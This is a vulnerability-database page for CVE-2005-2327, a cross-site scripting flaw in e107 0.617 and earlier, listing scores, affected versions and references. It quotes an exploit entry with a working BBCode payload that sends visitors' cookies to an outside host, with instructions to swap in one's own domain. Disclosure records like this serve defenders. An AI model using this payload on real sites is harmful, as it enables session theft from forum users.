CVE-2005-2327 : Detail

CVE-2005-2327

0.2%V3
Network
2005-07-20
02h00 +00:00
2017-10-18
14h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in e107 0.617 and earlier allows remote attackers to inject arbitrary web script or HTML via nested [url] BBCode tags.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1106

Publication date : 2005-07-13 22h00 +00:00
Author : warlord
EDB Verified : Yes

/* 1) Change milw0rm.com to your domain.com 2) Post the below code into a new message. Credits to Nick Griffin. /str0ke */ [color=#EFEFEF][url]www.ut[url=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] # milw0rm.com [2005-07-14]

Products Mentioned

Configuraton 0

E107>>E107 >> Version 0.547_beta

    E107>>E107 >> Version 0.548_beta

      E107>>E107 >> Version 0.549_beta

        E107>>E107 >> Version 0.551_beta

          E107>>E107 >> Version 0.552_beta

            E107>>E107 >> Version 0.553_beta

              E107>>E107 >> Version 0.554_beta

                E107>>E107 >> Version 0.555_beta

                  E107>>E107 >> Version 0.600

                  E107>>E107 >> Version 0.601

                  E107>>E107 >> Version 0.602

                  E107>>E107 >> Version 0.603

                  E107>>E107 >> Version 0.604

                  E107>>E107 >> Version 0.605

                  E107>>E107 >> Version 0.606

                  E107>>E107 >> Version 0.607

                  E107>>E107 >> Version 0.608

                  E107>>E107 >> Version 0.609

                  E107>>E107 >> Version 0.610

                  E107>>E107 >> Version 0.611

                  E107>>E107 >> Version 0.612

                  E107>>E107 >> Version 0.613

                  E107>>E107 >> Version 0.614

                  E107>>E107 >> Version 0.615a

                  E107>>E107 >> Version 0.616

                  E107>>E107 >> Version 0.617

                  E107>>E107 >> Version 5.1

                    E107>>E107 >> Version 5.3_beta

                      E107>>E107 >> Version 5.3_beta2

                        E107>>E107 >> Version 5.04

                          E107>>E107 >> Version 5.4_beta1

                            E107>>E107 >> Version 5.4_beta3

                              E107>>E107 >> Version 5.4_beta4

                                E107>>E107 >> Version 5.4_beta5

                                  E107>>E107 >> Version 5.4_beta6

                                    E107>>E107 >> Version 5.05

                                      E107>>E107 >> Version 5.21

                                        References

                                        http://securitytracker.com/id?1014513
                                        Tags : vdb-entry, x_refsource_SECTRACK
                                        https://www.exploit-db.com/exploits/1106
                                        Tags : exploit, x_refsource_EXPLOIT-DB